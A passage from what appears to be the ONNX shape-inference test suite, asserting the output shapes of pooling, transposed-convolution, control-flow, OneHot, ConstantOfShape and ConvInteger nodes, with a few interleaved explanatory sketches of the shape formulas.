[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_UPPER", kernel_shape=[2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 2, 2))])
def test_maxpool_with_same_upper_padding_and_stride_and_dilation(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_UPPER", kernel_shape=[2, 2], strides=[2, 2], dilations=[2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 2, 2))])
def test_maxpool_with_same_upper_padding_and_stride_one(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_UPPER", kernel_shape=[2, 2], strides=[1, 1])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 4, 4))])
def test_maxpool_with_same_lower_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 9, 9))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_LOWER", kernel_shape=[2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 5, 5))])
def test_maxpool_with_same_lower_padding_and_stride_and_dilation(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 9, 9))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_LOWER", kernel_shape=[2, 2], strides=[2, 2], dilations=[2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 5, 5))])
def test_maxpool_with_same_lower_padding_and_big_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("MaxPool", ["X"], ["Y"], auto_pad="SAME_LOWER", kernel_shape=[2, 2], strides=[4, 4])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 1, 1))])
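# With auto_pad SAME_UPPER or SAME_LOWER the expected spatial size in the tests
# above depends only on input size and stride. Hedged sketch (`_same_pad_out_size`
# is an illustrative helper, not part of this suite): output = ceil(in / stride).
def _same_pad_out_size(in_size, stride):
    return -(-in_size // stride)  # ceil division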
def test_averagepool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_averagepool_3D(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[2, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3, 3))])
def test_averagepool_with_padding(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 6, 6))])
def test_averagepool_with_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_averagepool_ceil(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (1, 1, 4, 4))],
[make_node("AveragePool", ["X"], ["Y"], kernel_shape=[3, 3], strides=[2, 2], ceil_mode=True)],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (1, 1, 2, 2))])
def test_lppool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("LpPool", ["X"], ["Y"], kernel_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_lppool_3D(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4, 4))],
[make_node("LpPool", ["X"], ["Y"], kernel_shape=[2, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3, 3))])
def test_lppool_with_padding(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("LpPool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 6, 6))])
def test_lppool_with_padding_and_stride(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("LpPool", ["X"], ["Y"], kernel_shape=[2, 2], pads=[1, 1, 2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 3, 3))])
def test_roipool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4)),
("rois", TensorProto.INT64, (2, 5))],
[make_node("MaxRoiPool", ["X", "rois"], ["Y"], pooled_shape=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (2, 3, 2, 2))])
def test_lp_norm(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7))],
[make_node('LpNormalization', ['x'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7))])
def test_instance_norm(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
('scale', TensorProto.FLOAT, (4,)),
('b', TensorProto.FLOAT, (4,))],
[make_node('InstanceNormalization', ['x', 'scale', 'b'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7))])
def test_global_maxpool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("GlobalMaxPool", ["X"], ["Y"])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 1, 1))])
def test_global_averagepool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("GlobalAveragePool", ["X"], ["Y"])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 1, 1))])
def test_global_lppool(self): # type: () -> None
graph = self._make_graph(
[("X", TensorProto.FLOAT, (5, 3, 4, 4))],
[make_node("GlobalLpPool", ["X"], ["Y"])],
[])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, (5, 3, 1, 1))])
def test_conv_transpose(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 33, 33))])
def test_conv_transpose_with_pads(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 30, 30))])
def test_conv_transpose_with_output_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2], output_shape=[36, 36])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 36, 36))])
def test_conv_transpose_with_kernel_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, None, None))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', kernel_shape=[3, 3], strides=[2, 2], pads=[1, 1, 2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 30, 30))])
def test_conv_transpose_with_dilations(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2], dilations=[3, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 34, 34))])
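# The ConvTranspose shapes asserted above follow the usual transposed-convolution
# rule. Hedged sketch (`_conv_transpose_out_size` is our illustrative helper):
# output = stride*(in - 1) + output_padding + dilation*(kernel - 1) + 1 - pad_total.
def _conv_transpose_out_size(in_size, kernel, stride=1, pad_total=0, dilation=1, output_padding=0):
    return stride * (in_size - 1) + output_padding + dilation * (kernel - 1) + 1 - pad_total
# e.g. the dilations case above: _conv_transpose_out_size(16, 3, 2, 3, 3) -> 34.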
def test_conv_transpose_with_group(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2], group=2)],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 64, 30, 30))])
def test_conv_transpose_with_group_and_output_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', strides=[2, 2], pads=[1, 1, 2, 2], group=2, output_shape=[36, 36])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 64, 36, 36))])
def test_conv_transpose_with_pads_and_auto_pads(self): # type: () -> None
# This test should fail: explicit pads and a non-NOTSET auto_pad are mutually exclusive
graph = self._make_graph(
[('X', TensorProto.FLOAT, (1, 1, 2, 2)),
('W', TensorProto.FLOAT, (1, 1, 3, 3)),
('B', TensorProto.FLOAT, (1, ))],
[make_node('ConvTranspose', ['X', 'W', 'B'], 'Y', auto_pad="SAME_UPPER", strides=[1, 1], pads=[0, 1, 1, 0])],
[])
self.assertRaises(onnx.shape_inference.InferenceError, onnx.shape_inference.infer_shapes, helper.make_model(graph), strict_mode=True)
def test_conv_transpose_auto_pads(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16)),
('W', TensorProto.FLOAT, (48, 32, 3, 3))],
[make_node('ConvTranspose', ['X', 'W'], 'Y', auto_pad="SAME_UPPER", strides=[2, 2])],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('Y', TensorProto.FLOAT, (25, 32, 32, 32))])
def test_mvn_function_output_shape(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (25, 48, 16, 16))],
[make_node('MeanVarianceNormalization', 'X', 'Y', axes=[0, 2, 3])],
[]
)
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (25, 48, 16, 16))])
def test_scan(self): # type: () -> None
batch_size = 1
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
# can't use self._make_graph for the subgraph, as it adds extra inputs for the Reshape
# operations it inserts. That breaks subgraph inference, which expects the number of inputs
# passed from Scan to match the GraphProto, but Scan knows nothing about the extra inputs.
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (batch_size, loop_state_size)),
('scan_input', TensorProto.FLOAT, (batch_size, seq_len, input_size))],
[make_node('Scan', ['', 'loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (batch_size, loop_state_size)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (batch_size, seq_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 8)])
def test_scan_opset9(self): # type: () -> None
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
# can't use self._make_graph for the subgraph, as it adds extra inputs for the Reshape
# operations it inserts. That breaks subgraph inference, which expects the number of inputs
# passed from Scan to match the GraphProto, but Scan knows nothing about the extra inputs.
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (loop_state_size,)),
('scan_input', TensorProto.FLOAT, (seq_len, input_size))],
[make_node('Scan', ['loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (loop_state_size,)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (seq_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_scan_opset9_axes(self): # type: () -> None
axis_0_len = 'axis0'
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
# can't use self._make_graph for the subgraph, as it adds extra inputs for the Reshape
# operations it inserts. That breaks subgraph inference, which expects the number of inputs
# passed from Scan to match the GraphProto, but Scan knows nothing about the extra inputs.
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (loop_state_size,)),
('scan_input', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
[make_node('Scan', ['loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph, scan_input_axes=[1])],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (loop_state_size,)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (seq_len, axis_0_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_scan_opset9_output_axes(self): # type: () -> None
axis_0_len = 'axis0'
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (loop_state_size,)),
('scan_input', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
[make_node('Scan', ['loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph, scan_input_axes=[1], scan_output_axes=[1])],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (loop_state_size,)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_scan_opset9_negative_axes(self): # type: () -> None
axis_0_len = 'axis0'
seq_len = 'sequence'
input_size = 2
loop_state_size = 3
input_value_infos = [make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('input', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.UNDEFINED, None)]
subgraph = helper.make_graph(
[make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('loop_state_orig', TensorProto.FLOAT, (loop_state_size,)),
('scan_input', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
[make_node('Scan', ['loop_state_orig', 'scan_input'], ['loop_state_final', 'scan_output'],
num_scan_inputs=1, body=subgraph, scan_input_axes=[-2], scan_output_axes=[-2])],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, (loop_state_size,)),
make_tensor_value_info('scan_output', TensorProto.FLOAT, (axis_0_len, seq_len, input_size))],
opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])
def test_if_ver1(self): # type: () -> None
# Create a simple If node where the 'then' subgraph adds to the current value, and the 'else' subgraph
# subtracts.
# can't use self._make_graph for the subgraphs, as it adds extra inputs for the Reshape
# operations it inserts. That breaks subgraph inference, which expects the subgraphs to have zero inputs.
then_subgraph = helper.make_graph(
[make_node('Add', ['current_value', 'add_value'], ['then_output'])],
"then_subgraph",
[], # no inputs
[make_tensor_value_info('then_output', TensorProto.UNDEFINED, None)],
)
else_subgraph = helper.make_graph(
[make_node('Sub', ['current_value', 'sub_value'], ['else_output'])],
"else_subgraph",
[], # no inputs
[make_tensor_value_info('else_output', TensorProto.UNDEFINED, None)],
)
graph = self._make_graph(
[('cond', TensorProto.BOOL, (1,)),
('current_value', TensorProto.FLOAT, (1,)),
('add_value', TensorProto.FLOAT, (1,)),
('sub_value', TensorProto.FLOAT, (1,))],
[make_node('If', ['cond'], ['if_output'],
then_branch=then_subgraph, else_branch=else_subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('if_output', TensorProto.FLOAT, (1,))],
opset_imports=[make_opsetid(ONNX_DOMAIN, 10)])
def test_if(self): # type: () -> None
# Create a simple If node where the 'then' subgraph adds to the current value, and the 'else' subgraph
# subtracts.
# can't use self._make_graph for the subgraphs, as it adds extra inputs for the Reshape
# operations it inserts. That breaks subgraph inference, which expects the subgraphs to have zero inputs.
then_subgraph = helper.make_graph(
[make_node('Add', ['current_value', 'add_value'], ['then_output'])],
"then_subgraph",
[], # no inputs
[make_tensor_value_info('then_output', TensorProto.UNDEFINED, None)],
)
else_subgraph = helper.make_graph(
[make_node('Sub', ['current_value', 'sub_value'], ['else_output'])],
"else_subgraph",
[], # no inputs
[make_tensor_value_info('else_output', TensorProto.UNDEFINED, None)],
)
graph = self._make_graph(
[('cond', TensorProto.BOOL, (1,)),
('current_value', TensorProto.FLOAT, (1,)),
('add_value', TensorProto.FLOAT, (1,)),
('sub_value', TensorProto.FLOAT, (1,))],
[make_node('If', ['cond'], ['if_output'],
then_branch=then_subgraph, else_branch=else_subgraph)],
[]
)
self._assert_inferred(graph, [make_tensor_value_info('if_output', TensorProto.FLOAT, (1,))])
def test_if_with_different_shapes_in_then_else_branches(self): # type: () -> None
# Create a simple If node where the 'then' subgraph adds to the current value, and the 'else' subgraph
# subtracts.
# can't use self._make_graph for the subgraphs, as it adds extra inputs for the Reshape
# operations it inserts. That breaks subgraph inference, which expects the subgraphs to have zero inputs.
then_subgraph = helper.make_graph(
[make_node('Add', ['current_value', 'add_value'], ['then_output'])],
"then_subgraph",
[], # no inputs
[make_tensor_value_info('then_output', TensorProto.UNDEFINED, (1,))],
)
else_subgraph = helper.make_graph(
[make_node('Sub', ['current_value', 'sub_value'], ['else_output'])],
"else_subgraph",
[], # no inputs
[make_tensor_value_info('else_output', TensorProto.UNDEFINED, (5,))],
)
graph = self._make_graph(
[('cond', TensorProto.BOOL, (1,)),
('current_value', TensorProto.FLOAT, (1,)),
('add_value', TensorProto.FLOAT, (1,)),
('sub_value', TensorProto.FLOAT, (5,))],
[make_node('If', ['cond'], ['if_output'],
then_branch=then_subgraph, else_branch=else_subgraph)],
[]
)
self._assert_inferred(graph, [make_tensor_value_info('if_output', TensorProto.FLOAT, (None,))]) # type: ignore
def test_maxunpool_shape_without_output_shape(self): # type: () -> None
graph = self._make_graph(
[('xT', TensorProto.FLOAT, (1, 1, 2, 2)),
('xI', TensorProto.FLOAT, (1, 1, 2, 2))],
[make_node('MaxUnpool', ['xT', 'xI'], 'Y', kernel_shape=[2, 2], strides=[2, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (1, 1, 4, 4))])
def test_maxunpool_shape_with_output_shape(self): # type: () -> None
graph = self._make_graph(
[('xT', TensorProto.FLOAT, (1, 1, 2, 2)),
('xI', TensorProto.FLOAT, (1, 1, 2, 2)),
('output_shape', TensorProto.FLOAT, (4, ))],
[make_node('MaxUnpool', ['xT', 'xI', 'output_shape'], 'Y', kernel_shape=[2, 2], strides=[2, 2])],
[make_tensor_value_info("Y", TensorProto.FLOAT, None)])
self._assert_inferred(graph, [make_tensor_value_info("Y", TensorProto.FLOAT, None)])
def test_onehot_without_axis(self): # type: () -> None
graph = self._make_graph(
[('indices', TensorProto.INT64, (2, 2)),
('depth', TensorProto.INT64, ()),
('values', TensorProto.FLOAT, (2, ))],
[make_node('OneHot', ['indices', 'depth', 'values'], 'Y')],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (2, 2, None))]) # type: ignore
def test_onehot_with_axis(self): # type: () -> None
graph = self._make_graph(
[('indices', TensorProto.INT64, (2, 3, 5)),
('depth', TensorProto.INT64, (1, )),
('values', TensorProto.FLOAT, (2, ))],
[make_node('OneHot', ['indices', 'depth', 'values'], 'Y', axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (2, None, 3, 5))]) # type: ignore
def test_loop(self): # type: () -> None
# can't use self._make_graph for the subgraph, as it adds extra inputs for the Reshape
# operations it inserts. That breaks subgraph inference, which expects the number of inputs
# passed from Loop to match the GraphProto, but Loop knows nothing about the extra inputs.
input_value_infos = [make_tensor_value_info('iter_num_in', TensorProto.INT64, (1,)),
make_tensor_value_info('cond_in', TensorProto.UNDEFINED, None),
make_tensor_value_info('loop_state_in', TensorProto.UNDEFINED, ())]
output_value_infos = [make_tensor_value_info('cond_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('loop_state_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.FLOAT, (3,))]
subgraph = helper.make_graph(
[make_node('Identity', ['cond_in'], ['cond_out']),
make_node('Identity', ['loop_state_in'], ['loop_state_out']),
make_node('Identity', ['outer_scope_input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('max_trip_count', TensorProto.INT64, (1,)),
('cond_orig', TensorProto.FLOAT, (1,)),
('loop_state_orig', TensorProto.FLOAT, (2,)),
('outer_scope_input', TensorProto.FLOAT, (3,))],
[make_node('Loop', ['max_trip_count', 'cond_orig', 'loop_state_orig'], ['loop_state_final', 'loop_output'],
body=subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_state_final', TensorProto.FLOAT, None), # shape may change between iterations
make_tensor_value_info('loop_output', TensorProto.FLOAT, (None, 3))]) # type: ignore
def test_loop_no_state(self): # type: () -> None
input_value_infos = [make_tensor_value_info('iter_num_in', TensorProto.INT64, (1,)),
make_tensor_value_info('cond_in', TensorProto.UNDEFINED, None)]
output_value_infos = [make_tensor_value_info('cond_out', TensorProto.UNDEFINED, None),
make_tensor_value_info('output', TensorProto.FLOAT, (3,))]
subgraph = helper.make_graph(
[make_node('Identity', ['cond_in'], ['cond_out']),
make_node('Identity', ['outer_scope_input'], ['output'])],
"subgraph",
input_value_infos,
output_value_infos
)
graph = self._make_graph(
[('max_trip_count', TensorProto.INT64, (1,)),
('cond_orig', TensorProto.FLOAT, (1,)),
('outer_scope_input', TensorProto.FLOAT, (3,))],
[make_node('Loop', ['max_trip_count', 'cond_orig'], ['loop_output'],
body=subgraph)],
[]
)
self._assert_inferred(
graph,
[make_tensor_value_info('loop_output', TensorProto.FLOAT, (None, 3))]) # type: ignore
def test_constantofshape_with_input_shape(self): # type: () -> None
graph = self._make_graph([],
[make_node("Constant", [], ['shape'],
value=make_tensor('shape', TensorProto.INT64, (3,), (3, 4, 5))),
make_node("ConstantOfShape", ['shape'], ['y'], value=make_tensor('value', TensorProto.INT32, (1, ), (2, )))],
[])
self._assert_inferred(graph,
[make_tensor_value_info('shape', TensorProto.INT64, (3,)),
make_tensor_value_info('y', TensorProto.INT32, (3, 4, 5))]) # type: ignore
def test_constantofshape_without_input_shape(self): # type: () -> None
graph = self._make_graph([('shape', TensorProto.INT64, (3, ))],
[make_node("ConstantOfShape", ['shape'], ['y'], value=make_tensor('value', TensorProto.UINT8, (1, ), (2, )))],
[])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.UINT8, (None, None, None))]) # type: ignore
def test_constantofshape_without_input_shape_scalar(self): # type: () -> None
graph = self._make_graph([('shape', TensorProto.INT64, (0, ))],
[make_node("ConstantOfShape", ['shape'], ['y'], value=make_tensor('value', TensorProto.UINT8, (1, ), (2, )))],
[])
self._assert_inferred(graph,
[make_tensor_value_info('y', TensorProto.UINT8, ())]) # type: ignore
def test_constantofshape_with_shape_zero(self): # type: () -> None
graph = self._make_graph([],
[make_node("Constant", [], ['shape'],
value=make_tensor('shape', TensorProto.INT64, (1,), (0,))),
make_node("ConstantOfShape", ['shape'], ['y'], value=make_tensor('value', TensorProto.INT32, (1, ), (2, )))],
[])
self._assert_inferred(graph,
[make_tensor_value_info('shape', TensorProto.INT64, (1,)),
make_tensor_value_info('y', TensorProto.INT32, (0,))]) # type: ignore
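# The ConstantOfShape cases above all rest on one rule: the output dims are the
# *element values* of the 1-D `shape` input. A minimal numpy sketch of that rule
# (the helper name is illustrative, not part of onnx):

```python
import numpy as np

def constant_of_shape(shape_tensor, fill_value, dtype):
    # Output dims are the element values of the 1-D shape input,
    # which is exactly what the assertions above check.
    return np.full(tuple(int(d) for d in shape_tensor), fill_value, dtype=dtype)

y = constant_of_shape(np.array([3, 4, 5], dtype=np.int64), 2, np.int32)
print(y.shape)      # (3, 4, 5)
empty = constant_of_shape(np.array([0], dtype=np.int64), 2, np.int32)
print(empty.shape)  # (0,) -- a zero-sized dim, as in the shape-zero test
```

# A `shape` input with zero elements (the `_scalar` test) would yield a rank-0
# output, since the tuple of dims is empty.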
def test_convinteger(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (3, 4, 5, 6, 7)),
('y', TensorProto.UINT8, (5, 4, 2, 4, 3))],
[make_node('ConvInteger', ['x', 'y'], 'z', pads=[0, 1, 1, 0, 0, 1], dilations=[1, 2, 2], strides=[1, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (3, 5, 4, 1, 3))])
def test_convinteger_dilations(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 8, 8, 8)),
('y', TensorProto.INT8, (50, 4, 3, 3, 3)),
('x_zero_point', TensorProto.UINT8, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('ConvInteger', ['x', 'y', 'x_zero_point', 'y_zero_point'], 'z', dilations=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 50, 6, 4, 2))])
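# The expected spatial dims in the ConvInteger tests follow the standard
# convolution output formula, applied per axis. A small sketch (helper name is
# illustrative) reproducing the (6, 4, 2) expectation above:

```python
def conv_out_dim(in_dim, kernel, stride=1, dilation=1, pad_total=0):
    # floor((in + pads - dilation*(kernel-1) - 1) / stride) + 1,
    # the per-axis formula shape inference applies to Conv-family ops.
    effective = dilation * (kernel - 1) + 1
    return (in_dim + pad_total - effective) // stride + 1

# Dilations test above: input 8 per axis, kernel 3, dilations (1, 2, 3),
# unit strides, no padding.
dims = [conv_out_dim(8, 3, dilation=d) for d in (1, 2, 3)]
print(dims)  # [6, 4, 2]
```

# The strides test follows the same formula: with strides (1, 2, 3) the axes
# come out to 6, 3 and 2.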
def test_convinteger_strides(self): # type: () -> None
graph = self._make_graph(
